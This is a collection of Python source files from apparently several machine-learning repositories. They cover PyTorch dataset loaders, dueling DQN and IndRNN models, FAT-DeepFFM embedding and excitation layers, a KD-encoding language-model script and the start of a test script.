from torch.utils.data import Dataset
from sklearn.model_selection import train_test_split
def get_id_columns(df):
user_and_target_id_columns = ["user_id", "target_user_id"]
return df[user_and_target_id_columns]
def extranct_interacted_user_rows(df):
tmp = df[["user_id", "label"]].groupby('user_id').sum()
interacted_user_id = tmp[tmp.label>0].reset_index()
return df[df.user_id.isin(interacted_user_id.user_id)]
def get_ethnicity_columns(df):
ethnicity_user = df.ethnicity_user
ethnicity_target = df.ethnicity_target
ethnicity_columns = [c for c in df.columns if "ethnicity_" in c]
df.drop(ethnicity_columns, axis=1, inplace=True)
df = df.assign(ethnicity_user=ethnicity_user,
ethnicity_target=ethnicity_target)
return df
def calculate_user_features(df):
c_id = 'user_id'
user_feature_columns = [c for c in df.columns
if '_user' in c and 'target_user_id' != c]
user_features = df.groupby(c_id)[user_feature_columns].head(1)
user_features[c_id] = df.loc[user_features.index].user_id
return user_features
def calculate_target_features(df):
c_id = 'target_user_id'
target_feature_columns =\
[c for c in df.columns.values if '_target' in c]
target_features = df[[c_id] + target_feature_columns]
return target_features
def calcurate_target_clicked(df):
result = df[['target_user_id', 'label']]\
.groupby('target_user_id')\
.agg(['sum', 'count'])\
.reset_index()
result.columns = ['target_user_id', 'label_sum', 'label_cnt']
result = result.assign(label_rate=result.label_sum/result.label_cnt)
result.index = df.groupby('target_user_id').head(1).index
return result
def get_target_ids_for_train_input(squewed_user_target_labels,
valued_target_idxs, n_high, n_low):
# 全て返す
return squewed_user_target_labels.index.values
n_total = n_high + n_low
high_rate_flag = squewed_user_target_labels.label > 0
if len(valued_target_idxs) >= n_total:
idxs = np.random.permutation(len(valued_target_idxs))[:n_total]
return valued_target_idxs[idxs]
query = ~squewed_user_target_labels.index.isin(valued_target_idxs)
query &= high_rate_flag
n_rest = n_total - len(valued_target_idxs)
if n_rest == 1:
hight = squewed_user_target_labels[query].sample(n_rest).index.values
return np.concatenate([valued_target_idxs, hight])
m_n_high = int(n_rest * n_high / n_total)
m_n_low = n_rest - m_n_high
hight = squewed_user_target_labels[query].sample(m_n_high, replace=True).index.values
low = squewed_user_target_labels[
squewed_user_target_labels.label == 0].sample(m_n_low, replace=True).index.values
idxs = np.concatenate([valued_target_idxs, hight, low])
return idxs
def get_target_ids_for_test_input(squewed_user_target_labels, n_high, n_low):
# 全て返す
return squewed_user_target_labels.index.values
n_total = n_high + n_low
high_rate_flag = squewed_user_target_labels.label > 0
if sum(high_rate_flag) < n_high:
hight = squewed_user_target_labels[high_rate_flag].index.values
n_low = n_total - sum(high_rate_flag)
else:
hight = squewed_user_target_labels[high_rate_flag].sample(n_high).index.values
low = squewed_user_target_labels[
squewed_user_target_labels.label == 0].sample(n_low, replace=True).index.values
idxs = np.concatenate([hight, low])
return idxs
def get_target_ids_for_input(squewed_user_target_labels,
valued_target_idxs, n_high, n_low, train=True):
if train:
return get_target_ids_for_train_input(squewed_user_target_labels, valued_target_idxs, n_high, n_low)
else:
return get_target_ids_for_test_input(squewed_user_target_labels, n_high, n_low)
class OwnDataset(Dataset):
def __init__(self, file_name, root_dir, n_high, n_low,
subset=False, transform=None, train=True, split_seed=555):
super().__init__()
print("Train:", train)
self.file_name = file_name
self.root_dir = root_dir
self.transform = transform
self.n_high = n_high
self.n_low = n_low
self._train = train
self.split_seed = split_seed
self.prepare_data()
self.user_features_orig = self.user_features
def __len__(self):
return len(self.user_and_target_ids)
def reset(self):
self.user_features = self.user_features_orig
def prepare_data(self):
data_path = Path(self.root_dir, self.file_name)
eme_data = pd.read_csv(data_path)
extracted_interacted_rows = extranct_interacted_user_rows(eme_data)
unique_user_ids = extracted_interacted_rows.user_id.unique()
train_user_ids, test_user_ids = train_test_split(unique_user_ids,
random_state=self.split_seed,
shuffle=True,
test_size=0.2)
if self._train:
_data = eme_data[eme_data.user_id.isin(train_user_ids)]
self.user_features = calculate_user_features(_data)
self.user_and_target_ids = get_id_columns(_data)
self.rewards = eme_data[["user_id", "target_user_id", "label"]]
self.target_features_all = calculate_target_features(eme_data) # _data
else:
_data = eme_data[eme_data.user_id.isin(test_user_ids)]
self.user_and_target_ids = get_id_columns(_data)
self.user_features = calculate_user_features(_data)
self.rewards = eme_data[["user_id", "target_user_id", "label"]]
self.target_features_all = calculate_target_features(eme_data)
print("user", self.user_features.shape)
print("target", len(self.target_features_all.target_user_id.unique()))
def __getitem__(self, idx):
ids = self.user_and_target_ids.iloc[idx].values
current_user_id = ids[0]
user_feature = self.user_features[self.user_features.user_id == current_user_id]
user_feature = user_feature.copy().drop("user_id", axis=1)
user_feature = user_feature.astype(np.float32).values
user_feature = user_feature.reshape(-1)
query = (self.rewards.user_id == current_user_id)
query &= (self.rewards.label == 1)
valued_target_idxs = self.rewards[query].index.values
# TODO: 後で名前変えたる
squewed_user_target_labels =\
self.rewards.groupby("target_user_id").head(1)
target_idxs = get_target_ids_for_input(
squewed_user_target_labels, valued_target_idxs,
self.n_high, self.n_low, self._train)
target_features = self.target_features_all.loc[target_idxs].copy().reindex()
target_ids = target_features.target_user_id.values
target_features =\
target_features.copy().drop("target_user_id", axis=1)
target_features = target_features.astype(np.float32).values
eliminate_teacher = self.target_features_all.loc[valued_target_idxs].copy().reindex()
eliminate_teacher_ids = eliminate_teacher.target_user_id.values
eliminate_teacher_val = target_ids == eliminate_teacher_ids[0]
for v in eliminate_teacher_ids[1:]:
eliminate_teacher_val += target_ids == v
eliminate_teacher_val = eliminate_teacher_val.astype(np.float32)
return (torch.FloatTensor(user_feature),
torch.FloatTensor(target_features),
current_user_id,
target_ids,
eliminate_teacher_val)
def get_reward(self, current_user_id, target_ids):
query_user = self.rewards.user_id == current_user_id
query_target = self.rewards.target_user_id.isin(target_ids)
query = (query_user) & (query_target)
reward = self.rewards[query].label.values
if len(reward) == 0:
return 0.
else:
return float(reward.max())
def loader(dataset, batch_size, shuffle=True):
loader = torch.utils.data.DataLoader(
dataset,
batch_size=batch_size,
shuffle=shuffle,
num_workers=0)
return loader
```
#### File: src/model/ddqn_for_all.py
```python
import torch
import torch.nn as nn
from model.swichable_normalization import SwitchNorm1d
def inner(aa, bb):
return (aa * bb.unsqueeze(dim=1).expand(aa.shape)).sum(dim=2)
class ValueNet(nn.Module):
def __init__(self, dim_in, action_num):
super().__init__()
self.fcb1 = nn.Sequential(
nn.Linear(dim_in, 64),
# SwitchNorm1d(192),
nn.ReLU())
self.fcb2 = nn.Sequential(
nn.Linear(64, 128),
# SwitchNorm1d(64),
nn.ReLU())
self.fcb3 = nn.Sequential(
nn.Linear(256*4, 256*6),
# SwitchNorm1d(64),
nn.ReLU())
self.fc1 = nn.Linear(128, 128)
def forward(self, user_feature):
h = self.fcb1(user_feature)
h = self.fcb2(h)
# h = self.fcb3(h)
out = self.fc1(h)
return out
class AdvantageNet(nn.Module):
def __init__(self, dim_in, action_num):
super().__init__()
self.n_out_vec = 128
self.fcb1 = nn.Sequential(
nn.Linear(dim_in*2, 128),
# SwitchNorm1d(128),
nn.ReLU())
self.fcb2 = nn.Sequential(
nn.Linear(128, 128),
# SwitchNorm1d(64),
nn.ReLU())
self.fcb3 = nn.Sequential(
nn.Linear(64, 32),
# SwitchNorm1d(64),
nn.ReLU())
self.fc1 = nn.Linear(128, self.n_out_vec)
def forward(self, user_feature, target_features):
# print(user_feature.shape, target_features.shape)
n_bach, n_feature = user_feature.shape
expanded_shape = list(target_features.shape[:2])+[user_feature.shape[-1]]
uf = user_feature.unsqueeze(dim=1).expand(expanded_shape)
n_features = target_features.shape[-1] + user_feature.shape[-1]
# print(uf.shape, target_features.shape, n_features)
x = torch.cat([uf, target_features], dim=2).view(-1, n_features)
h = self.fcb1(x)
h = self.fcb2(h)
# h = self.fcb3(h)
out = self.fc1(h)
return out.view(n_bach, -1, self.n_out_vec)
class Model(nn.Module):
"""
dueling network
"""
def __init__(self, dim_in, action_num):
super().__init__()
self.value_net = ValueNet(dim_in, action_num)
self.advantage_net = AdvantageNet(dim_in, action_num)
def forward(self, observation, target_features):
# user_feature, content_id = observation
user_feature = observation
v = self.value_net(user_feature)
a = self.advantage_net(user_feature, target_features)
q = inner(a, v)
# print("q:", q.shape)
return q.view(q.size(0), -1)
def save(self, path, step, optimizer):
torch.save({
'step': step,
'state_dict': self.state_dict(),
'optimizer': optimizer.state_dict()
}, path)
def load(self, checkpoint_path, optimizer=None):
checkpoint = torch.load(checkpoint_path)
step = checkpoint['step']
self.load_state_dict(checkpoint['state_dict'])
if optimizer is not None:
optimizer.load_state_dict(checkpoint['optimizer'])
```
#### File: src/model/ddqn.py
```python
import torch
import torch.nn as nn
from model.swichable_normalization import SwitchNorm1d
class ValueNet(nn.Module):
def __init__(self, dim_in, action_num):
super().__init__()
h_dim = action_num
self.fcb1 = nn.Sequential(
nn.Linear(dim_in, h_dim),
# SwitchNorm1d(h_dim),
nn.ReLU())
self.fcb1_1 = nn.Sequential(
nn.Linear(256, 256*2),
# SwitchNorm1d(192),
nn.ReLU())
self.fcb2 = nn.Sequential(
nn.Linear(h_dim, h_dim),
# SwitchNorm1d(h_dim),
nn.ReLU())
self.fcb3 = nn.Sequential(
nn.Linear(h_dim, h_dim),
# SwitchNorm1d(h_dim),
nn.ReLU())
self.fc1 = nn.Linear(h_dim, action_num)
def forward(self, user_feature):
h = self.fcb1(user_feature)
# h = self.fcb1_1(h)
h = self.fcb2(h)
h = self.fcb3(h)
out = self.fc1(h)
return out
class AdvantageNet(nn.Module):
def __init__(self, dim_in, action_num):
super().__init__()
self.fcb1 = nn.Sequential(
nn.Linear(dim_in*2, 128),
# SwitchNorm1d(128),
nn.ReLU())
self.fcb2 = nn.Sequential(
nn.Linear(128, 64),
# SwitchNorm1d(64),
nn.ReLU())
self.fcb3 = nn.Sequential(
nn.Linear(64, 32),
# SwitchNorm1d(32),
nn.ReLU())
self.fc1 = nn.Linear(32, 1)
def forward(self, user_feature, target_features):
n_bach, n_feature = user_feature.shape
expanded_shape = list(target_features.shape[:2])+[user_feature.shape[-1]]
uf = user_feature.unsqueeze(dim=1).expand(expanded_shape)
n_features = target_features.shape[-1] + user_feature.shape[-1]
# print(uf.shape, target_features.shape, n_features)
x = torch.cat([uf, target_features], dim=2).view(-1, n_features)
h = self.fcb1(x)
h = self.fcb2(h)
h = self.fcb3(h)
out = self.fc1(h)
return out.view(n_bach, -1)
class Model(nn.Module):
"""
dueling network
"""
def __init__(self, dim_in, action_num):
super().__init__()
self.value_net = ValueNet(dim_in, action_num)
self.advantage_net = AdvantageNet(dim_in, action_num)
def forward(self, user_feature, target_features):
# print(user_feature.shape, target_features.shape)
v = self.value_net(user_feature)
a = self.advantage_net(user_feature, target_features)
q = v + (a - a.mean(dim=0))
return q.view(q.size(0), -1)
def save(self, path, step, optimizer):
torch.save({
'step': step,
'state_dict': self.state_dict(),
'optimizer': optimizer.state_dict()
}, path)
def load(self, checkpoint_path, optimizer=None):
checkpoint = torch.load(checkpoint_path)
step = checkpoint['step']
self.load_state_dict(checkpoint['state_dict'])
if optimizer is not None:
optimizer.load_state_dict(checkpoint['optimizer'])
``` |
{
"source": "0shimax/pytorch-EncNet",
"score": 3
} |
#### File: src/model/utils.py
```python
import torch
from torch import nn
def calculate_l1_loss(output, target, lagrange_coef=0.0005):
l1_crit = nn.L1Loss(size_average=False) # SmoothL1Loss
reg_loss = l1_crit(output.argmax(dim=1).float(), target.float())
return lagrange_coef * reg_loss
def smooth_in(model):
l_noise = []
for i, p in enumerate(model.parameters()):
noise = torch.FloatTensor(p.shape).uniform_(-.01, .01)
p.data -= noise
l_noise.append(noise)
# model.parameters()[i] = p
return l_noise
def smooth_out(model, l_noise):
for i, (p, noise) in enumerate(zip(model.parameters(), l_noise)):
p.data += noise
l_noise.append(noise)
# model.parameters()[i] = p
# return l_noise
``` |
{
"source": "0shimax/pytorch-examples",
"score": 3
} |
#### File: 0shimax/pytorch-examples/ind_rnn_net.py
```python
import torch
import torch.nn.functional as F
from torch.nn.parameter import Parameter
from torch.autograd import Variable
import numpy
class IndRNN(torch.nn.Module):
def __init__(self, num_input_units, num_units,
recurrent_max_abs=25., non_linearity=F.relu):
super().__init__()
recurrent_max_abs = min(recurrent_max_abs, 1.0 / numpy.sqrt(num_units))
self.input_kernel = Parameter(torch.zeros(num_units, num_input_units))
self.recurrent_kernel = Parameter(
torch.Tensor(num_units,).uniform_(
-recurrent_max_abs, recurrent_max_abs))
self.bias = Parameter(torch.zeros(num_units,))
self.non_linearity = non_linearity
self.num_units = num_units
self.recurrent_max_abs = recurrent_max_abs
self.reset_state()
def reset_state(self):
self.h = Variable(torch.zeros(self.num_units))
def set_hidden_state(self, state):
self.h = state
def clip_recurrent_kernel(self):
self.recurrent_kernel.data.copy_(
torch.clamp(self.recurrent_kernel.data,
max=self.recurrent_max_abs,
min=-self.recurrent_max_abs))
def forward(self, x):
self.clip_recurrent_kernel()
output = self.non_linearity(
F.linear(x, self.input_kernel, self.bias)
+ F.mul(self.recurrent_kernel, self.h))
# self.clip_recurrent_kernel()
# recurrent_update = self.h.mul(
# self.recurrent_kernel.expand_as(self.h))
# gate_inputs += recurrent_update.expand_as(gate_inputs)
# gate_inputs += self.bias.expand_as(gate_inputs)
# output = self.non_linearity(gate_inputs)
return output
class EncDec(torch.nn.Module):
def __init__(self, in_size, h_unit_size, slot_size, memory_size):
super().__init__()
self.encorder = IndRNN(in_size, h_unit_size)
self.decorder = IndRNN(in_size, h_unit_size)
self.hidden_to_output = torch.nn.Linear(h_unit_size, in_size)
self.is_train = True
def reset_state(self):
self.encorder.reset_state()
self.decorder.reset_state()
def train_step(self, xs, ys):
for time_idx in reversed(range(1, xs.shape[1])):
dec_h = self.decorder(xs[:, time_idx])
out = self.hidden_to_output(dec_h)
ys.append(out.data)
self.loss += (xs[:, time_idx-1] - out)**2
return ys
def predict(self, xs, ys, out):
for time_idx in reversed(range(1, xs.shape[1])):
dec_h = self.decorder(out)
out = self.hidden_to_output(dec_h)
ys.append(out.data)
return ys
def forward(self, xs):
n_batch, n_times, dim_obs = xs.shape
for time_idx in range(n_times):
x = xs[:, time_idx]
h = self.encorder(x)
self.decorder.set_hidden_state(h)
ys = []
out = self.hidden_to_output(self.decorder.h)
ys.append(out)
self.loss = (xs[:, -1] - out)**2
if self.is_train:
self.out = self.train_step(xs, ys)
else:
self.out = self.predict(xs, ys, out)
self.loss /= n_times
self.loss = self.loss.sum()/n_batch
return self.loss
``` |
{
"source": "0shimax/pytorch-fat-deep-ffm",
"score": 3
} |
#### File: src/feature/build.py
```python
from typing import List
import pandas
from pathlib import Path
from xfeat import SelectCategorical, ConcatCombination, LabelEncoder, Pipeline, SelectNumerical
def read_df(root_dir:str, path:str, categorical_cols:List[str], exclude_cols:List[str]=["imp_time"]):
df = pandas.read_csv(Path(root_dir, path))
df = df.astype({c:str for c in categorical_cols})
encoder = Pipeline([
SelectCategorical(exclude_cols=exclude_cols),
LabelEncoder(output_suffix=""),
])
df_encoded = pandas.concat([SelectNumerical().fit_transform(df), encoder.fit_transform(df)], axis=1)
return df_encoded
```
#### File: src/model/cen_layer.py
```python
from typing import Callable
import torch
import torch.nn as nn
class ComposeExcitationNetworkLayer(nn.Module):
r"""Layer class of Compose Excitation Network (CEN) / Squeeze-and-Excitation Network (SENET).
Compose Excitation Network was used in FAT-Deep :title:`Junlin Zhang et al, 2019`[1] and
Squeeze-and-Excitation Network was used in FibiNET :title:`Tongwen Huang et al, 2019`[2]
#. compose field-aware embedded tensors by a 1D convolution with a :math:`1 * 1` kernel
feature-wisely from a :math:`k * n` tensor of field i into a :math:`k * 1` tensor.
#. concatenate the tensors and feed them to dense network to calculate attention
weights.
#. inputs' tensor are multiplied by attention weights, and return outputs tensor with
shape = (B, N * N, E).
:Reference:
#. `<NAME> et al, 2019. FAT-DeepFFM: Field Attentive Deep Field-aware Factorization Machine
<https://arxiv.org/abs/1905.06336>`_.
#. `<NAME> et al, 2019. FibiNET: Combining Feature Importance and Bilinear feature Interaction for
Click-Through Rate Prediction <https://arxiv.org/abs/1905.09433>`_.
"""
def __init__(self,
num_fields: int,
reduction: int = 1,
activation: Callable[[torch.Tensor], torch.Tensor] = nn.ReLU()):
r"""Initialize ComposeExcitationNetworkLayer
Args:
num_fields (int): Number of inputs' fields.
reduction (int, optional): Size of reduction in dense layer.
Defaults to 1.
activation (Callable[[T], T], optional): Activation function in dense layers.
Defaults to nn.ReLU().
Attributes:
pooling (torch.nn.Module): Adaptive average pooling layer to compose tensors.
fc (torch.nn.Sequential): Sequential of linear and activation to calculate weights of
attention, which the linear layers are:
:math:`[Linear(N^2, \frac{N^2}{reduction}), Linear(\frac{N^2}{reduction}, N^2)]`.
"""
# refer to parent class
super(ComposeExcitationNetworkLayer, self).__init__()
# initialize 1d pooling layer
self.pooling = nn.AdaptiveAvgPool1d(1)
# initialize dense layers
squared_num_fields = num_fields ** 2
reduced_num_fields = squared_num_fields // reduction
self.fc = nn.Sequential()
self.fc.add_module("ReductionLinear", nn.Linear(squared_num_fields, reduced_num_fields))
self.fc.add_module("ReductionActivation", activation)
self.fc.add_module("AdditionLinear", nn.Linear(reduced_num_fields, squared_num_fields))
self.fc.add_module("AdditionActivation", activation)
def forward(self, emb_inputs: torch.Tensor) -> torch.Tensor:
r"""Forward calculation of ComposeExcitationNetworkLayer
Args:
emb_inputs (T), shape = (B, N, E), dtype = torch.float: Field aware embedded features tensors.
Returns:
T, shape = (B, N, E), dtype = torch.float: Output of ComposeExcitationNetworkLayer.
"""
# Pool emb_inputs
# inputs: emb_inputs, shape = (B, N, E) <- EM_i (n_feild, embed_size)
# output: pooled_inputs, shape = (B, N, 1)
pooled_inputs = self.pooling(emb_inputs.rename(None))
pooled_inputs.names = ("B", "N", "E")
# Flatten pooled_inputs
# inputs: pooled_inputs, shape = (B, N, 1)
# output: pooled_inputs, shape = (B, N)
pooled_inputs = pooled_inputs.flatten(["N", "E"], "N")
# Calculate attention weight with dense layer forwardly
# inputs: pooled_inputs, shape = (B, N)
# output: attn_w, shape = (B, N)
attn_w = self.fc(pooled_inputs.rename(None))
attn_w.names = ("B", "N")
# Un-flatten attention weights and apply it to emb_inputs
# inputs: attn_w, shape = (B, N)
# inputs: emb_inputs, shape = (B, N, E)
# output: outputs, shape = (B, N, E)
attn_w = attn_w.unflatten("N", (("N", attn_w.size("N")), ("E", 1)))
# Multiply attentional weights on field embedding tensors
## outputs = emb_inputs * attn_w
outputs = torch.einsum("ijk,ijh->ijk", [emb_inputs.rename(None), attn_w.rename(None)])
outputs.names = ("B", "N", "E")
return outputs, attn_w
```
#### File: src/model/dnn_layer.py
```python
from typing import Callable, List
import torch
import torch.nn as nn
class MultilayerPerceptionLayer(nn.Module):
r"""Layer class of Multilayer Perception (MLP), which is also called fully connected
layer, dense layer, deep neural network, etc, to calculate high order non linear
relations of features with a stack of linear, dropout and activation.
"""
def __init__(self,
inputs_size: int,
output_size: int,
layer_sizes: List[int],
dropout_p: List[float] = None,
activation: Callable[[torch.Tensor], torch.Tensor] = nn.ReLU()):
"""Initialize MultilayerPerceptionLayer
Args:
inputs_size (int): Input size of MLP, i.e. size of embedding tensor.
output_size (int): Output size of MLP
layer_sizes (List[int]): Layer sizes of MLP
dropout_p (List[float], optional): Probability of Dropout in MLP.
Defaults to None.
activation (Callable[[T], T], optional): Activation function in MLP.
Defaults to nn.ReLU().
Attributes:
inputs_size (int): Input size of MLP.
model (torch.nn.Sequential): Sequential of MLP.
Raises: ValueError: when embed_size or num_fields is missing if using embed_size and num_field pairs,
or when inputs_size is missing if using inputs_size ValueError: when dropout_p is not None and length of
dropout_p is not equal to that of layer_sizes
"""
# refer to parent class
super(MultilayerPerceptionLayer, self).__init__()
# check if length of dropout_p is not equal to length of layer_sizes
if dropout_p is not None and len(dropout_p) != len(layer_sizes):
raise ValueError("length of dropout_p must be equal to length of layer_sizes.")
# bind inputs_size to inputs_size
self.inputs_size = inputs_size
# create a list of inputs_size and layer_sizes
layer_sizes = [inputs_size] + layer_sizes
layers = []
# initialize module of linear, activation and dropout, and add them to sequential module
for i, (in_f, out_f) in enumerate(zip(layer_sizes[:-1], layer_sizes[1:])):
layers.append(nn.Linear(in_f, out_f))
if activation is not None:
layers.append(activation)
if dropout_p is not None:
layers.append(nn.Dropout(dropout_p[i]))
# initialize module of linear and add it to sequential module
layers.append(nn.Linear(layer_sizes[-1], output_size))
# initialize sequential of model
self.model = nn.Sequential(*layers)
def forward(self, emb_inputs: torch.Tensor) -> torch.Tensor:
r"""Forward calculation of MultilayerPerceptionLayer
Args:
emb_inputs (T), shape = (B, N, E), dtype = torch.float: Embedded features tensors.
Returns:
T, shape = (B, N, O), dtype = torch.float: Output of MLP.
"""
# Calculate with model forwardly
# inputs: emb_inputs, shape = (B, N, E)
# output: outputs, shape = (B, N, O)
outputs = self.model(emb_inputs.rename(None))
# Rename tensor names
if outputs.dim() == 2:
outputs.names = ("B", "O")
elif outputs.dim() == 3:
outputs.names = ("B", "N", "O")
return outputs
```
#### File: src/model/embed_layer.py
```python
from typing import List
import torch
import torch.nn as nn
import numpy
class EmbedingLayer(nn.Module):
def __init__(self,
num_numerical_fields: int,
num_categorical_fields: int,
num_ids: List[int],
embed_size: int,
device: str="cpu"):
super(EmbedingLayer, self).__init__()
# map id=0 if id is NULL. that's why adding a aditional dimention.
if num_numerical_fields>0:
self.conv = nn.Conv1d(1, embed_size*2, 1)
self.num_numerical_fields = num_numerical_fields
self.num_categorical_fields = num_categorical_fields
self.embed_size = embed_size
# bind num_field to the length of field_sizes
self.num_fields = len(num_ids)
# create ModuleList of nn.Embedding for each field of inputs
# map id=0 if id is NULL. that's why adding a aditional dimention.
self.embeddings = nn.ModuleList([
nn.Embedding(sum(num_ids)+1, embed_size) for _ in range(self.num_fields)
])
# create offsets to re-index inputs by adding them up
## self.offsets = torch.Tensor((0, *np.cumsum(num_ids)[:-1])).long().unsqueeze(0)
self.offsets = torch.Tensor((0, *numpy.cumsum(num_ids)[:-1])).long()
self.offsets.names = ("N",)
self.offsets = self.offsets.unflatten("N", [("B", 1), ("N", self.offsets.size("N"))])
self.offsets.to(device)
# initialize nn.Embedding with xavier_uniform_ initializer
for embedding in self.embeddings:
nn.init.xavier_uniform_(embedding.weight.data)
def forward(self,
X_categorical: List[torch.Tensor],
X_numerical: torch.Tensor = None
) -> torch.Tensor:
X_categorical = X_categorical + self.offsets
X_categorical = X_categorical.rename(None)
if X_numerical is None:
outputs = torch.cat([self.embeddings[i](X_categorical) for i in range(self.num_fields)], dim=1)
outputs.names = ("B", "N", "E")
return outputs
numerical_emb = self.conv(X_numerical).reshape(-1, self.num_numerical_fields*2, self.embed_size)
cat_emb = torch.cat([self.embeddings[i](X_categorical) for i in range(self.num_fields)], dim=1)
outputs = torch.cat([numerical_emb, cat_emb], dim=1)
outputs.names = ("B", "N", "E")
return outputs
``` |
{
"source": "0shimax/Pytorch-KDEncoding",
"score": 3
} |
#### File: Pytorch-KDEncoding/src/train.py
```python
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from models.kdencoding import SimpleKDEncoding
class NGramLanguageModeler(nn.Module):
def __init__(self, vocab_size, embedding_dim, context_size):
super().__init__()
self.kd_enc = SimpleKDEncoding(
vocab_size, k_concept=2, k_character=2, D=4)
self.embeddings = nn.Linear(4, embedding_dim)
# self.embeddings = nn.Embedding(vocab_size, embedding_dim)
self.linear1 = nn.Linear(context_size * embedding_dim, 128)
self.linear2 = nn.Linear(128, vocab_size)
def forward(self, inputs):
kd = self.kd_enc(inputs)
kd = kd.type(torch.FloatTensor)
embeds = self.embeddings(kd).view((1, -1))
# embeds = self.embeddings(inputs).view((1, -1))
out = F.relu(self.linear1(embeds))
out = self.linear2(out)
log_probs = F.log_softmax(out, dim=1)
return log_probs
CONTEXT_SIZE = 2
EMBEDDING_DIM = 10
# We will use Shakespeare Sonnet 2
test_sentence = """When forty winters shall besiege thy brow,
And dig deep trenches in thy beauty's field,
Thy youth's proud livery so gazed on now,
Will be a totter'd weed of small worth held:
Then being asked, where all thy beauty lies,
Where all the treasure of thy lusty days;
To say, within thine own deep sunken eyes,
Were an all-eating shame, and thriftless praise.
How much more praise deserv'd thy beauty's use,
If thou couldst answer 'This fair child of mine
Shall sum my count, and make my old excuse,'
Proving his beauty by succession thine!
This were to be new made when thou art old,
And see thy blood warm when thou feel'st it cold.""".split()
# we should tokenize the input, but we will ignore that for now
# build a list of tuples. Each tuple is ([ word_i-2, word_i-1 ], target word)
trigrams = [([test_sentence[i], test_sentence[i + 1]], test_sentence[i + 2])
for i in range(len(test_sentence) - 2)]
# print the first 3, just so you can see what they look like
print(trigrams[:3])
vocab = set(test_sentence)
word_to_ix = {word: i for i, word in enumerate(vocab)}
print("voc size:", len(vocab))
losses = []
loss_function = nn.NLLLoss()
model = NGramLanguageModeler(len(vocab), EMBEDDING_DIM, CONTEXT_SIZE)
optimizer = optim.SGD(model.parameters(), lr=0.001)
for epoch in range(300):
total_loss = 0
for context, target in trigrams:
# Step 1. Prepare the inputs to be passed to the model (i.e, turn the words
# into integer indices and wrap them in tensors)
context_idxs = torch.LongTensor([[word_to_ix[w] for w in context]])
# Step 2. Recall that torch *accumulates* gradients. Before passing in a
# new instance, you need to zero out the gradients from the old
# instance
model.zero_grad()
# Step 3. Run the forward pass, getting log probabilities over next
# words
log_probs = model(context_idxs)
# Step 4. Compute your loss function. (Again, Torch wants the target
# word wrapped in a tensor)
loss = loss_function(log_probs, torch.LongTensor([word_to_ix[target]]))
# Step 5. Do the backward pass and update the gradient
loss.backward()
optimizer.step()
# Get the Python number from a 1-element Tensor by calling tensor.item()
total_loss += loss.item()
losses.append(total_loss)
print(losses) # The loss decreased every iteration over the training data!
context_idxs = torch.LongTensor([[word_to_ix[w] for w in ['made', 'make']]])
log_probs = model.kd_enc(context_idxs, debug=True)
``` |
{
"source": "0shimax/pytorch-sam-lr",
"score": 3
} |
#### File: src/model/lr.py
```python
import torch
import torch.nn as nn
import torch.nn.functional as F
class LrNet(nn.Module):
def __init__(self, in_dim, n_class=2):
super(LrNet, self).__init__()
self.fc1 = nn.Linear(in_dim, 256)
self.fc2 = nn.Linear(256, 256)
self.fc3 = nn.Linear(256, n_class)
def forward(self, x):
h = F.relu(self.fc1(x))
h = F.dropout(h)
h = F.relu(self.fc2(h))
h = F.dropout(h)
out = self.fc3(h)
return out.squeeze(1)
``` |
{
"source": "0shimax/PyTorch-SoftTriple",
"score": 3
} |
#### File: src/feature/data_loader_for_NFCM.py
```python
import torchvision
import torch
from torch.utils.data import Dataset
import numpy as np
import random
# ラベル クラス
# 0 T-シャツ/トップ (T-shirt/top)
# 1 ズボン (Trouser)
# 2 プルオーバー (Pullover)
# 3 ドレス (Dress)
# 4 コート (Coat)
# 5 サンダル (Sandal)
# 6 シャツ (Shirt)
# 7 スニーカー (Sneaker)
# 8 バッグ (Bag)
# 9 アンクルブーツ (Ankle boot)
near_cat_dict = {0:[0,1,5,6,7,9], 1:[0,1,2,5,6,7,9], 2:[1,2,5,7], 3:[3,4,8],
4:[1,4,6,8,9], 5:[0,1,5,6], 6:[1,5,6,7,9], 7:[0,1,6,7],
8:[3,4,8,9], 9:[1,4,6,8,9]}
# far_cat = {0:[], 1:[], 2:[], 3:[], 4:[], 5:[], 6:[], 7:[], 8:[], 9:[]}
class FMNISTDataset(Dataset):
def __init__(self, n_class=10, train=True):
super().__init__()
self.n_class = n_class
self.train = train
self.n_relation = self.n_class**2
self.fashion_mnist_data = torchvision.datasets.FashionMNIST(
'./fashion-mnist',
transform=torchvision.transforms.ToTensor(),
train=train,
download=True)
self.labels = [fnmn[1] for fnmn in torchvision.datasets.FashionMNIST('./fashion-mnist')]
self.labels = np.array(self.labels, dtype=np.int32)
def __len__(self):
return len(self.fashion_mnist_data)
def __getitem__(self, idx):
image, cat = self.fashion_mnist_data[idx]
return image, cat
def loader(dataset, batch_size, shuffle=True):
loader = torch.utils.data.DataLoader(
dataset,
batch_size=batch_size,
shuffle=shuffle,
num_workers=0)
return loader
``` |
{
"source": "0shimax/SE-Wavenet",
"score": 3
} |
#### File: src/features/diff_dim_seq.py
```python
import numpy as np
import itertools
def add_diff_features(features):
seq_len, n_dim = features.shape
comb = list(itertools.combinations(range(n_dim), 2))
add_mat = np.empty([seq_len, len(comb)], dtype=np.float32)
for i_add, cmb in enumerate(comb):
add_mat[:, i_add] = features[:, cmb[0]] - features[:, cmb[1]]
return np.concatenate((features, add_mat), axis=1)
```
#### File: SE-Wavenet/src/test.py
```python
import argparse
from pathlib import Path
import torch
import torch.nn.functional as F
from sklearn.metrics import precision_recall_fscore_support, roc_curve, auc
import matplotlib.pyplot as plt
import numpy as np
from data.data_loader import ActivDataset, loader
from models.focal_loss import FocalLoss
from models.ete_waveform import EteWave
from models.post_process import as_seaquence
torch.manual_seed(555)
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
print("device:", device)
def main(args):
model = EteWave(args.n_class).to(device)
if Path(args.resume_model).exists():
print("load model:", args.resume_model)
model.load_state_dict(torch.load(args.resume_model))
test_data_file_names =\
[line.rstrip() for line in open(args.test_data_file_pointer_path)]
test_dataset = ActivDataset(test_data_file_names, args.root_dir,
seq_len=args.test_seq_len, time_step=args.time_step,
is_train=False)
test_loader = loader(test_dataset, 1, shuffle=False)
test(args, model, test_loader)
def test(args, model, data_loader):
model.eval()
test_loss = 0
segmentation_correct = 0
lack_classifier_correct = 0
total_len = 0
lack_total_len = 0
true_seq_labels = []
inf_seq_labels = []
true_finish_labels = []
inf_finish_labels = []
inf_finish_proba = []
true_finish_labels_mat = np.empty([len(data_loader), 5])
inf_finish_labels_mat = np.empty([len(data_loader), 5])
with torch.no_grad():
for i_batch, (l_data, l_target, l_lack_labels) in enumerate(data_loader):
l_data = l_data.to(device)
